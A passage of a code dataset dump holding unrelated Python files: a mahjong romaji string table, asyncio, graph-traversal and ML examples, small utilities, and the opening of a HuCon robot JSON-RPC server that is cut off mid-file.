zokkou-shimasu)\"\n\nyakuman_level_list=('','yakuman','daburu-yakuman','toripuru-yakuman','yonbai-yakuman','gobaiya-kuman','rokubai-yakuman','nanabai-yakuman')\nkazoeyakuman='kazoeyakuman'\ntehai=\"tehai\"\nmore_than_4=\"{} wa 4-mai ijou\"\nmore_than_14=\"{}-mai no tehai wa 14-mai ijou\"\nless_than_13=\"{}-mai no tehai wa 13-mai ika (fuuro ari kamo)\"\ntaapai_or_shaopai=\"{} mai no tehai wa taapai mata wa shoopai\"\ndora='dora'\n\nkokushimusoujuusanmen='kokushimusoujuusanmen'\nkokushimusou='kokushimusou'\nchiitoitsu='chiitoitsu'\ntanyaochuu='tanyaochuu'\nyakuhai_ton='ton'\nyakuhai_nan='nan'\nyakuhai_shaa='shaa'\nyakuhai_pei='pei'\nyakuhai_haku='haku'\nyakuhai_hatsu='hatsu'\nyakuhai_chun='chun'\npinfu='pinfu'\niipeekoo='iipeekoo'\nrinshankaihou='rinshankaihou'\nsanshokudoujun='sanshokudoujun'\nikkitsuukan='ikkitsuukan'\nhonchantaiyaochuu='honchantaiyaochuu'\ntoitoihoo='toitoihoo'\nsanankoo='sanankoo'\nhonroutou='honroutou'\nsanshokudookoo='sanshokudookoo'\nshousangen='shousangen'\nhoniisoo='honiisoo'\njunchantaiyaochuu='junchantaiyaochuu'\nryanpeekoo='ryanpeekoo'\nchiniisoo='chiniisoo'\nsuuankootanki='suuankootanki'\nsuuankoo='suuankoo'\ndaisangen='daisangen'\ntsuuiisoo='tsuuiisoo'\nshousuushii='shousuushii'\nryuuiisoo='ryuuiisoo'\nchinroutou='chinroutou'\njunseichuurenpouton='junseichuurenpouton'\nchuurenpouton='chuurenpouton'\ndaisuushii='daisuushii'\nsankantsu='sankantsu'\nsuukantsu='suukantsu'\nbeginning_of_the_cosmos='beginning of the cosmos'\n\nhoora=\"Hoora\"\nfuu=\" fuu \"\nhan=\" han\"\nten=\" ten\"\nnot_hoora=\"Agaranai\"\nda=\"da\"\nkaraten=\"karaten\"\ntenpai=\"tenpai \"\nnooten=\"Nooten\"\n\ncolon=\": \"\nideographic_comma=\", \"\nquestion_mark=\"(?)\"\ntime_spent=\"Keisan wa {}-byou p kakarimashita\"\n\nhas_koyaku=\"Koyaku o yuukou ni shimashita\"\nnot_has_koyaku=\"Koyaku o mukou ni shimashita\"\nkoyaku=\"koyaku\"\nuumensai=\"uumensai\"\nsanrenkoo=\"sanrenkoo\"\nisshokusanjun=\"isshokusanjun\"\ndaisharin=\"daisharin\"\ndaichikurin=\"daichikurin\"\ndaisuurin=\"daisuurin\"\ndaichisei=\"daichisei\"\n\nok=\"Kakunin\"\nclear=\"Torinozoku\"\n","repo_name":"huxiangyou/mahjong-hoora","sub_path":"lang/romaji.py","file_name":"romaji.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"19961120007","text":"import asyncio\nimport time\nfrom typing import List\n\n\ndef fibonacci(i: int) -> int:\n\n if i == 0:\n return 0\n if i == 1:\n return 1\n\n return fibonacci(i - 1) + fibonacci(i - 2)\n\n\nasync def fibonacci_async(number: int):\n ioloop = asyncio.get_event_loop()\n res = await ioloop.run_in_executor(None, fibonacci, number)\n return res\n\n\nasync def long_operation() -> None:\n print('Start long operation')\n await asyncio.sleep(1)\n print('End long operation')\n\n\nasync def start_without_waiting() -> None:\n print('Start main')\n ioloop = asyncio.get_event_loop()\n task = ioloop.create_task(long_operation())\n # asyncio.sleep(1)\n # asyncio.run(long_operation())\n # ioloop.close()\n print('End main')\n\n\nasync def main():\n # asyncio.run(start_without_waiting())\n start = time.time()\n res = await calc_list_of_fibonacci([37, 34, 35])\n\n # asyncio.run(calc_list_of_fibonacci([37, 34, 35]))\n\n # res = [fibonacci(number) for number in [37, 34, 35]]\n print(res)\n\n print(f'time = {time.time() - start}')\n\n\nasync def calc_list_of_fibonacci(numbers: List[int]):\n ioloop = asyncio.get_event_loop()\n tasks = [fibonacci_async(i) for i in numbers]\n res = await asyncio.gather(*tasks)\n print(res)\n\n\nif __name__ == '__main__':\n asyncio.run(main())","repo_name":"mvereshchagin/MO2Asyncio","sub_path":"using_asyncio.py","file_name":"using_asyncio.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20043428719","text":"# urs/bin/python\r\n# encoding:utf-8\r\n\r\nimport os,time\r\nimport unittest\r\nimport configparser as cparser\r\nfrom testcase.v722.easycase.login import Login\r\nfrom testcase.v722.easycase.send import Send\r\nfrom base.baseAdb import BaseAdb\r\nfrom psam.psam import Psam\r\nfrom mail.mailOperation import EmailOperation\r\n\r\nPATH = lambda p:os.path.abspath(\r\n os.path.join(os.path.dirname(__file__),p)\r\n )\r\n\r\n\r\n# ======== Reading user_db.ini setting ===========\r\nbase_dir = str((os.path.dirname(__file__)))\r\nbase_dir = base_dir.replace('\\\\', '/')\r\nfile_path = base_dir + \"/user_db.ini\"\r\n\r\ncf = cparser.ConfigParser()\r\ncf.read(file_path)\r\n\r\nusername = cf.get(\"userconf\", \"user1\")\r\npwd = cf.get(\"userconf\", \"pwd1\")\r\n\r\n##====================\r\n\r\nclass PeakValue(unittest.TestCase):\r\n \r\n def setUp(self): \r\n eo = EmailOperation(username+\"@139.com\", pwd)\r\n eo.moveForlder([\"100\",\"INBOX\"])\r\n \r\n BaseAdb.adbIntallUiautmator()\r\n \r\n self.driver = Psam()\r\n \r\n #释放实例,释放资源\r\n def tearDown(self):\r\n self.driver.quit()\r\n eo = EmailOperation(username+\"@139.com\", pwd)\r\n eo.moveForlder([\"INBOX\",\"100\"])\r\n\r\n def testCase(self):\r\n \r\n network = BaseAdb.getNetworkType()\r\n print('当前网络状态:%s' %network)\r\n \r\n runtimes = 2\r\n \r\n for x in range(1,runtimes):\r\n time.sleep(5)\r\n eo = EmailOperation(username+\"@139.com\", pwd)\r\n eo.checkInbox()\r\n time.sleep(5)\r\n print('当前运行次数为:%r' %(str(x)))\r\n\r\n try:\r\n stat = u'开始登录' \r\n login=Login(self.driver,username, pwd)\r\n login.loginActionPeakValue()\r\n \r\n stat = u'发送邮件' \r\n send = Send(self.driver,username+'@139.com')\r\n send.sendActionPeakValue()\r\n \r\n time.sleep(5)\r\n eo = EmailOperation(username+\"@139.com\", pwd)\r\n eo.clearForlder([u'已删除',u'已发送']) \r\n time.sleep(5) \r\n except BaseException as be:\r\n print(\"运行到:%s 运行出错,当次数据不入数据库!\" %stat)\r\n print(be)\r\n\r\n \r\n\r\n \r\nif __name__ == \"__main__\":\r\n suite = unittest.TestSuite()\r\n suite.addTest(PeakValue('testCase'))\r\n runner = unittest.TextTestRunner(verbosity=2)\r\n runner.run(suite)","repo_name":"hi-cbh/pytest","sub_path":"src/testcase/v722/peakValue.py","file_name":"peakValue.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10750022097","text":"from solutions.ch14.Graph import Graph\nfrom solutions.ch6.ArrayQueue import ArrayQueue\n\nfrom collections import OrderedDict\n\ndef dfs(g, u, discovered):\n \"\"\"\n Perform DFS of the undiscovered portion of Graph g starting at Vertex u.\n discovered is an ordered dictionary mapping each vertex to the edge that was used to\n discover it during the DFS. (u should be ”discovered” prior to the call.)\n Newly discovered vertices will be added to the dictionary as a result.\n\n Returns last discovered vertex\n \"\"\" \n for e in g.incident_edges(u):\n v = e.opposite(u)\n if v not in discovered:\n discovered[v] = e\n dfs(g, v, discovered)\n return list(discovered.keys())[-1]\n\ndef bfs(g, u, discovered):\n \"\"\"\n Perform BFS of the undiscovered portion of Graph g starting at Vertex s.\n discovered is a dictionary mapping each vertex to the edge that was used to\n discover it during the BFS (s should be mapped to None prior to the call).\n Newly discovered vertices will be added to the dictionary as a result.\n\n Returns last discovered vertex\n \"\"\"\n q = ArrayQueue()\n q.enqueue(u)\n\n while not q.is_empty():\n u = q.dequeue()\n for e in g.incident_edges(u):\n v = e.opposite(u)\n if v not in discovered:\n discovered[v] = e\n q.enqueue(v)\n return list(discovered.keys())[-1]\n\n\ndef construct_path(u, discovered):\n path = [u]\n while discovered[u] != None:\n path.append(discovered[u].opposite(u))\n u = discovered[u].opposite(u)\n return path\n\nif __name__ == \"__main__\":\n g = Graph()\n a = g.insert_vertex(\"A\")\n b = g.insert_vertex(\"B\")\n c = g.insert_vertex(\"C\")\n d = g.insert_vertex(\"D\")\n e = g.insert_vertex(\"E\")\n f = g.insert_vertex(\"F\")\n\n g.insert_edge(a, b)\n g.insert_edge(b, c)\n g.insert_edge(b, d)\n g.insert_edge(b, e)\n g.insert_edge(d, a)\n g.insert_edge(e, f)\n g.insert_edge(f, c)\n\n discovered = OrderedDict([(a, None)])\n last = dfs(g, a, discovered)\n print(last)\n print(construct_path(e, discovered))\n\n discovered = OrderedDict([(a, None)])\n last = bfs(g, a, discovered)\n print(last)\n print(construct_path(e, discovered))","repo_name":"itma96/Data-Structures-And-Algorithms-In-Python","sub_path":"solutions/ch14/traversals.py","file_name":"traversals.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74553734311","text":"\"\"\"create t1 table\n\nRevision ID: 9d08b9ea5451\nRevises:\nCreate Date: 2022-04-28 15:04:21.847475\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '9d08b9ea5451'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 't1',\n sa.Column('pk', sa.Integer, primary_key=True, nullable=False),\n sa.Column('v', sa.Integer),\n sa.Column('d', sa.String),\n )\n\n\ndef downgrade():\n op.drop_table('t1')\n","repo_name":"AndreiHondrari/techonologies-exploration","sub_path":"python-orm-databases/sqlalchemy-alembic/p01_basic/alembic/versions/9d08b9ea5451_create_t1_table.py","file_name":"9d08b9ea5451_create_t1_table.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"818127749","text":"class Solution:\n def search(self, nums: List[int], target: int) -> int:\n\n pivot = nums[0]\n if target == pivot:\n return 0\n\n left = 0\n right = len(nums) - 1\n\n while left <= right:\n mid = (left + right) // 2\n\n if nums[mid] == target:\n return mid\n\n logic = (target >= nums[mid]) ^ (nums[mid] >= pivot) ^ (pivot >= target)\n if logic:\n right = mid - 1\n else:\n left = mid + 1\n\n return -1","repo_name":"ahmaddroobi99/ProblemSolving","sub_path":"searchInRotaedArray.py","file_name":"searchInRotaedArray.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38702306970","text":"import openpyxl\nimport re\n\ndef extract_channels_from_xlsx(filename):\n channels = set()\n wb = openpyxl.load_workbook(filename)\n ws = wb.active\n for row in ws.iter_rows(values_only=True):\n for cell in row:\n if isinstance(cell, str):\n matches = re.findall(r'(?:@|https?://t\\.me/|https?://telegram\\.me/)(\\w+)', cell)\n # print(\"Cell:\", cell)\n # print(\"Matches:\", matches)\n channels.update(matches)\n return channels\n\ndef save_channels_to_file(channels, output_file):\n with open(output_file, 'w') as file:\n file.write('\\n'.join(channels))\n\n\nchannels_file = '../data/channels.xlsx'\noutput_file = '../data/channels.txt'\n\nextracted_channels = extract_channels_from_xlsx(channels_file)\nsave_channels_to_file(extracted_channels, output_file)\n","repo_name":"ali-salloum6/who-said-innopolis-server","sub_path":"utils/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41756339192","text":"from net import Net\nimport torch\n\n\ndef test(model_name, loader): \n net = Net()\n net.load_state_dict(torch.load(\"./\"+model_name))\n dataiter = iter(loader)\n images, labels = dataiter.next()\n #to be able to count the acc\n correct = 0\n total = 0 \n\n with torch.no_grad(): #no gradients cuz' it's not training\n for data in loader:\n images, labels = data\n outputs = net(images)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n print(\"Accuracy: %d %%\" % (100 * correct / total))\n\n \n \n \n \n","repo_name":"moxi43/mnist_torch","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2832908248","text":"from django.shortcuts import render\nfrom api.forms import MainForm,OtherForm\nfrom api.models import Main,OtherField\nfrom pymongo import MongoClient\nfrom Ostadkar_final.settings import HOST_NAME,DATABASE_NAME\nfrom .serializers import MainSerializer as ms\nimport json\n\n\ndef main(request):\n mform = MainForm()\n oform = OtherForm()\n if request.method == 'POST':\n mform = MainForm(request.POST)\n oform = OtherForm(request.POST)\n oobj = OtherField()\n mobj = Main()\n mobj.sender = mform['sender'].value()\n mobj.datetime = mform['datetime'].value()\n mobj.priority = mform['priority'].value()\n mobj.description = mform['description'].value()\n oobj.other = oform['other'].value()\n\n\n print(mobj.other_fk_id)\n if mform.is_valid() and oform.is_valid():\n # Connection\n myclient = MongoClient(HOST_NAME)\n mydb = myclient[DATABASE_NAME]\n maincol = mydb[\"api_test\"]\n mainjson = ms(mobj)\n\n\n if oobj.other:\n try :\n jsonfile = json.loads(oobj.other)\n # maincol.insert_one(mainjson)\n\n mainjson['other'] = jsonfile\n maincol.insert(mainjson)\n except:\n mainjson[\"other\"] = oobj.other\n maincol.insert(mainjson)\n print(\"Could not load json\")\n else:\n maincol.insert(mainjson)\n\n return render(request,'api/main.html', context={'form1':mform,'form2':oform})\n\n\n\n","repo_name":"pedrampd/Ostadkar_final","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72292322472","text":"import os\nfrom pathlib import Path\nfrom typing import Optional\n\nimport pyheif\nfrom PIL import Image\n\n\ndef read_heic_image(input_filename: str) -> Image.Image:\n heif_file = pyheif.read(input_filename)\n image = Image.frombytes(\n heif_file.mode,\n heif_file.size,\n heif_file.data,\n \"raw\",\n heif_file.mode,\n heif_file.stride,\n )\n return image\n\n\ndef read_image(input_filename: str) -> Optional[Image.Image]:\n filename = Path(input_filename).name\n if not os.path.isfile(path=input_filename):\n return None\n\n filename_split = filename.split(\".\")\n if len(filename_split) != 2:\n print(f\"Ignoring {input_filename} because it has no extension.\")\n return None\n\n filename_extension = filename.split(\".\")[1].lower()\n if filename_extension in (\"mov\", \"mp4\"):\n print(f\"Ignoring {input_filename} because it is a video.\")\n return None\n # maybe it's an image at this point\n if filename_extension == \"heic\":\n return read_heic_image(input_filename=input_filename)\n else:\n try:\n image = Image.open(input_filename)\n return image\n except Exception:\n print(f\"Ignoring {input_filename} because it cannot be opened.\")\n","repo_name":"tianle91/image-deduplication","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15184572999","text":"def solve():\r\n N, A, B = map(int, input().split())\r\n h = []\r\n for _ in range(N):\r\n h.append(int(input()))\r\n ans_min = 0\r\n ans_max = 10 ** 9\r\n while ans_min + 1 < ans_max:\r\n ans = (ans_min + ans_max) // 2\r\n count = 0\r\n for i in h:\r\n count += (max(0, i - B * ans) + A - B - 1) // (A - B)\r\n if count > ans:\r\n ans_min = ans\r\n else:\r\n ans_max = ans\r\n print(ans_max)\r\n return\r\nsolve()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc075/B/4794775.py","file_name":"4794775.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"25568796226","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport csv\r\n\r\n\r\ndatas=open(\"./iris.csv\", \"r\", encoding=\"utf-8\")\r\ndatas=csv.reader(datas)\r\ni=0\r\ninfo=[]\r\ntarget_list=[]\r\nfor data in datas:\r\n if i==0:\r\n i=1\r\n continue\r\n if list(data)[-1] ==\"Setosa\":\r\n continue\r\n info.append(np.array([float(list(data)[1]), float(list(data)[2]), 1]))\r\n if list(data)[-1] == \"Versicolor\":\r\n target_list.append(0)\r\n elif list(data)[-1] == \"Virginica\":\r\n target_list.append(1)\r\n\r\n\r\nnum_iteration=200000\r\nlearning_rate=0.01\r\n\r\n\r\ntarget_list=np.array(target_list)\r\n\r\ninfo=np.array(info) #(100, 3)\r\ninfo=np.transpose(info) #(3, 100)\r\n\r\nplt.scatter(info[0][0:50], info[1][0:50], c=\"r\")\r\nplt.scatter(info[0][50:100], info[1][50:100], c=\"b\")\r\n\r\nsepal_width_mean=np.mean(info[0])\r\nsepal_width_std=np.std(info[0])\r\n\r\ninfo[0]= (info[0] - sepal_width_mean) / sepal_width_std\r\n\r\npetal_length_mean= np.mean(info[1])\r\npetal_length_std= np.std(info[1])\r\n\r\ninfo[1]= (info[1] - petal_length_mean) / petal_length_std\r\n\r\nw1, w2, w0= 0.1, 0.5, 1 #0.1,0.5,1\r\n\r\nfor i in range(num_iteration):\r\n w=np.array([w1, w2, w0])\r\n\r\n predict=w @ info #(100, )\r\n predict_sigmoid= 1 / (1 + pow(np.e, -predict))\r\n\r\n loss= -(target_list * np.log(predict_sigmoid) + (1-target_list) * np.log(1-predict_sigmoid)) / len(info[0])\r\n\r\n if i==0:\r\n print(\"Before Training: \", abs(np.sum(loss)))\r\n\r\n w1 -= learning_rate * float(-(np.sum(info[0] * (target_list - predict_sigmoid)) / len(info[0])))\r\n w2 -= learning_rate * float(-(np.sum(info[1] * (target_list - predict_sigmoid)) / len(info[0])))\r\n w0 -= learning_rate * float(-(np.sum((target_list - predict_sigmoid)) / len(info[0])))\r\n\r\nprint(\"After Training: \", abs(np.sum(loss)))\r\n\r\nx1=np.linspace(2, 3.75, 100)\r\nx1_scailing = (x1 - sepal_width_mean) / sepal_width_std\r\nx2_scailing = -((w1*x1_scailing + w0) / w2)\r\nx2 = petal_length_std * x2_scailing + petal_length_mean\r\nplt.plot(x1, x2, c=\"g\")\r\n\r\nplt.show()\r\n","repo_name":"dokyung36d/machinelearning_uos","sub_path":"machinelearning_tasks_5.py","file_name":"machinelearning_tasks_5.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32436029974","text":"\n#\n# idades = [39, 30, 27, 18]\n#\n# print(type(idades))\n#\n# print(len(idades))\n#\n# idades.append(15)\n#\n# print(idades)\n#\n# for idade in idades:\n# print(idade)\n#\n# idades.remove(30)\n# print(idades)\n#\n# idades.insert(0,12)\n#\n# print(idades)\n#\n# # idades.clear()\n#\n# print(28 in idades)\n#\n# print(15 in idades)\n#\n# if 15 in idades:\n# idades.remove(15)\n#\n# idades.insert(0,20)\n#\n# print(idades)\n#\n# idades.extend([27,19])\n#\n# print(idades)\n#\n#\n#\n# idades_no_ano_que_vem = []\n#\n# for idade in idades:\n# idades_no_ano_que_vem.append(idade + 1)\n#\n# print(idades_no_ano_que_vem)\n#\n#\n# #list comprehension\n# idades_no_ano_que_vem = [(idade+1) for idade in idades]\n# print(idades_no_ano_que_vem)\n#\n# idade_maior_21 = [(idade) for idade in idades if idade > 21]\n# print(idade_maior_21)\n#\n# def faz_processamento_visualizacao(lista):\n# print(len(lista))\n#\n# faz_processamento_visualizacao(idades)\n\ndef faz_processamento_visualizacao(lista = None):\n if lista == None:\n lista = list()\n print(len(lista))\n print(lista)\n lista.append(13)\n\nfaz_processamento_visualizacao()\nfaz_processamento_visualizacao()\n\n\n\n\n\n","repo_name":"jean-script/Python-projetos","sub_path":"PycharmProjects/colecoes/introducao_collections.py","file_name":"introducao_collections.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29066686527","text":"import cv2\nimport numpy as np\n\nfrom ikalog.utils import matcher\n\n_TRUTH_2_SVM = {True: 1, False: -1}\n_SVM_2_ZEROONE = {-1: 0, 1: 1}\n\n\ndef normalize_player_name(img_name, debug=False):\n img_name_w_norm = np.zeros((15, 250), dtype=np.uint8)\n img_name_w = matcher.MM_WHITE(sat=(0, 96), visibility=(48, 255))(img_name)\n\n img_name_x_hist = np.extract(\n np.sum(img_name_w, axis=0) > 128,\n np.arange(img_name_w.shape[1]),\n )\n\n img_name_y_hist = np.extract(\n np.sum(img_name_w, axis=1) > 128,\n np.arange(img_name_w.shape[0]),\n )\n\n if (len(img_name_x_hist) == 0) or (len(img_name_y_hist) == 0):\n # In some cases, we can't find any pixels.\n return img_name_w_norm\n\n img_name_left = np.min(img_name_x_hist)\n img_name_right = np.max(img_name_x_hist)\n\n img_name_top = np.min(img_name_y_hist)\n img_name_bottom = np.max(img_name_y_hist)\n\n # Cropping error? should be handled gracefully.\n if not (img_name_left < img_name_right):\n return None\n\n if not (img_name_top < img_name_bottom):\n return None\n\n img_name_w = img_name_w[\n img_name_top:img_name_bottom, img_name_left:img_name_right]\n\n img_name_w_norm[:, 0: img_name_w.shape[1]] = cv2.resize(\n img_name_w, (img_name_w.shape[1], 15))\n\n if debug:\n print(img_name_w_norm.shape)\n cv2.imshow('name', img_name_w_norm)\n cv2.waitKey(1)\n\n return img_name_w_norm\n\n\ndef train_svm_classifiers(img_name_list, debug=False):\n \"\"\"\n Train player name classifier for specified img_name list.\n\n The images will be training with OpenCV Support Vector Machine functions.\n Returns list of SVM objects.\n\n The array would have \"None\" for the entry that SVM was not properly\n trained.\n \"\"\"\n assert isinstance(img_name_list, list)\n\n img_name_list = np.array(img_name_list, dtype=np.float32)\n\n X = np.array(\n list(map(lambda img: np.array(img).reshape((-1)), img_name_list)))\n\n # Train SVM per counter player.\n H = []\n for img in img_name_list:\n # y = Response for SVM Training. e.g. [1, -1, -1, -1]\n y = list(map(lambda e: _TRUTH_2_SVM[\n np.array_equal(e, img)], img_name_list))\n y = np.array(y, dtype=np.int)\n\n h = cv2.ml.SVM_create()\n h.setGamma(1)\n h.setC(1)\n h.setKernel(cv2.ml.SVM_LINEAR)\n h.setType(cv2.ml.SVM_C_SVC)\n\n h.train(X, cv2.ml.ROW_SAMPLE, y)\n\n # Test the model.\n r, predicted = h.predict(X)\n predicted_01 = None\n if r == 0:\n predicted_01 = map(lambda e: _SVM_2_ZEROONE[int(e)], predicted)\n predicted_01 = list(predicted_01)\n ok = (np.sum(predicted_01) == 1) and \\\n (np.argmax(y) == np.argmax(predicted_01))\n\n if not ok:\n h = None\n\n else:\n # SVM Classification failed.\n h = None\n\n H.append(h)\n\n print(H)\n import time\n time.sleep(3)\n return H\n\n\ndef predict(self, H_list, img_name):\n \"\"\"\n Predict the specified image.\n\n Returns index number, or None if it is not certain.\n \"\"\"\n\n features = np.array(img_name, dtype=np.float32).reshape((1, -1))\n\n matched = 0\n index = None\n\n for h in H_list:\n # Skip invalid hypothesises.\n if h is None:\n continue\n\n r, predicted = h.predict(features)\n if predicted[0] > 0:\n matched = matched + 1\n index = H_list.index(h)\n\n # If there are more than two or no matches, return None.\n if matched != 1:\n return None\n\n # If there is the exact match, return the index.\n return index\n\n\nclass PlayerNameClassifier(object):\n\n def __init__(self, img_name_list, debug=False):\n self._models = train_svm_classifiers(img_name_list, debug=debug)\n\n def predict(self, img_name, debug=False):\n \"\"\"\n Predict the specified image.\n\n Returns index number, or None if it is not certain.\n \"\"\"\n\n return predict(self, self._models, img_name)\n","repo_name":"hasegaw/IkaLog","sub_path":"ikalog/utils/player_name.py","file_name":"player_name.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"72"} +{"seq_id":"5585886351","text":"import threading\nfrom datetime import datetime, timedelta\nimport os\nfrom os.path import expanduser\nimport json\nimport subprocess\nimport time\nimport tempfile\nimport signal\nimport socket\nimport typing\n\nfrom HuConLogMessage import HuConLogMessage\nimport HuConNetiface\nfrom PyUci import WirelessHelper\n\n\nclass HuConJsonRpc:\n \"\"\" This class implements the functionality of the which will the server provide.\n \"\"\"\n\n # Name for the server to identification\n _SERVER_NAME = 'HuConRobot'\n\n # Folder where all custom code files are stored.\n _CODE_ROOT = os.path.join(expanduser(\"~\"), 'hucon', 'code')\n\n # Folder where all custom code files are stored.\n _EXAMPLE_ROOT = os.path.join(os.path.abspath(os.path.join(os.getcwd(), os.pardir)), 'code')\n\n # Path to the version file.\n _VERSION_FILE = os.path.join(os.path.abspath(os.path.join(os.getcwd(), os.pardir)), '__version__')\n\n # Path to the update file.\n _UPDATE_FILE = os.path.join(os.path.abspath(os.path.join(os.getcwd(), os.pardir)), 'update.sh')\n\n # Define the port on which the server should listening on.\n _LISTENING_PORT = 8080\n\n # Current version of the server.\n _version = 'beta'\n\n # Store the current running state\n _is_running = False\n\n # Store the current process to communicate with a running process\n _current_proc = None\n\n # Queue for all log messages\n _log = HuConLogMessage()\n\n # Wireless Helper object for handle wireless settings\n _wifi = WirelessHelper(_log)\n\n _message_buffer_for_input: typing.List[str] = []\n\n def __init__(self):\n \"\"\" Initialize the RPC server.\n \"\"\"\n if os.path.exists(self._VERSION_FILE):\n with open(self._VERSION_FILE, 'r') as file:\n self._version = file.readline()\n\n if not os.path.exists(self._CODE_ROOT):\n os.makedirs(self._CODE_ROOT)\n\n print('%s v. %s' % (self._SERVER_NAME, self._version))\n print('Custom code path: \\'%s\\'' % self._CODE_ROOT)\n print('Example code path: \\'%s\\'' % self._EXAMPLE_ROOT)\n\n def handle_control(self, rpc_request):\n \"\"\" Handle the JSON RPC request.\n \"\"\"\n if rpc_request['method'] == 'get_version':\n return self._get_version(rpc_request)\n elif rpc_request['method'] == 'get_robot_info':\n return self._get_robot_info(rpc_request)\n elif rpc_request['method'] == 'poll':\n return self._poll(rpc_request)\n elif rpc_request['method'] == 'get_file_list':\n return self._get_file_list(rpc_request)\n elif rpc_request['method'] == 'create_folder':\n return self._create_folder(rpc_request)\n elif rpc_request['method'] == 'load_file':\n return self._load_file(rpc_request)\n elif rpc_request['method'] == 'save_file':\n return self._save_file(rpc_request)\n elif rpc_request['method'] == 'is_running':\n return self._get_is_running(rpc_request)\n elif rpc_request['method'] == 'execute':\n return self._execute(rpc_request)\n elif rpc_request['method'] == 'run':\n return self._run(rpc_request)\n elif rpc_request['method'] == 'push_input':\n return self._receive_input(rpc_request)\n elif rpc_request['method'] == 'kill':\n return self._kill(rpc_request)\n elif rpc_request['method'] == 'get_possible_post_data':\n return self._get_possible_post_data(rpc_request)\n elif rpc_request['method'] == 'event':\n return self._event(rpc_request)\n elif rpc_request['method'] == 'check_update':\n return self._check_update(rpc_request)\n elif rpc_request['method'] == 'update':\n return self._update(rpc_request)\n elif rpc_request['method'] == 'shutdown':\n return self._shutdown(rpc_request)\n elif rpc_request['method'] == 'get_saved_wifi_networks':\n return self._get_saved_wifi_networks(rpc_request)\n elif rpc_request['method'] == 'get_wifi_found':\n return self._get_wifi_found(rpc_request)\n elif rpc_request['method'] == 'add_wifi':\n return self._add_wifi(rpc_request)\n elif rpc_request['method'] == 'move_wifi_up':\n return self._move_wifi_up(rpc_request)\n elif rpc_request['method'] == 'move_wifi_down':\n return self._move_wifi_down(rpc_request)\n elif rpc_request['method'] == 'remove_wifi':\n return self._remove_wifi(rpc_request)\n elif rpc_request['method'] == 'connect_wifi':\n return self._connect_wifi(rpc_request)\n elif rpc_request['method'] == 'enable_sta_wifi':\n return self._enable_sta_wifi(rpc_request)\n elif rpc_request['method'] == 'disable_sta_wifi':\n return self._disable_sta_wifi(rpc_request)\n elif rpc_request['method'] == 'get_ap_settings':\n return self._get_ap_settings(rpc_request)\n elif rpc_request['method'] == 'enable_ap_wifi':\n return self._enable_ap_wifi(rpc_request)\n elif rpc_request['method'] == 'disable_ap_wifi':\n return self._disable_ap_wifi(rpc_request)\n elif rpc_request['method'] == 'set_ap_settings':\n return self._set_ap_settings(rpc_request)\n else:\n return self._return_error(rpc_request['id'], 'Command not known.')\n\n @staticmethod\n def _get_rpc_response(rpc_id):\n \"\"\" Return a json rpc response message.\n \"\"\"\n rpc_response = {\n 'jsonrpc': '2.0',\n 'id': rpc_id}\n\n return rpc_response\n\n @staticmethod\n def _return_error(rpc_id, error, status_code=400):\n \"\"\" Return an well formed error.\n \"\"\"\n rpc_response = {'jsonrpc': '2.0',\n 'error': error,\n 'id': rpc_id}\n\n return json.dumps(rpc_response), status_code\n\n @staticmethod\n def _replace_hucon_requests(message):\n \"\"\" Print an answer from HuCon whenever the the message 'Hello HuCon!' is found.\n \"\"\"\n search_string = 'print(\\'Hello HuCon!\\')'\n replace_string = 'print(\\'Hello HuCon!\\\\n\\\\nHello human!\\\\nI am a Hu[man] Con[trolled] robot.\\\\n\\')'\n if search_string in message:\n message = message.replace(search_string, replace_string)\n return message\n\n _file_runner = None\n\n def _run_file(self, filename):\n \"\"\" This function takes care about starting and stopping the thread for running user python scripts\n \"\"\"\n if self._file_runner is not None:\n self._kill_process()\n self._file_runner.join()\n self._file_runner = None\n\n self._file_runner = threading.Thread(target=self._run_file_worker, args=(filename,))\n self._file_runner.start()\n\n def _run_file_worker(self, filename):\n \"\"\" Threaded worker function for running the user scripts.\n It catches all outputs and provides input functions for the process\n \"\"\"\n error_detected = False\n # I am feeling very guilty - but it seems to be a very effective 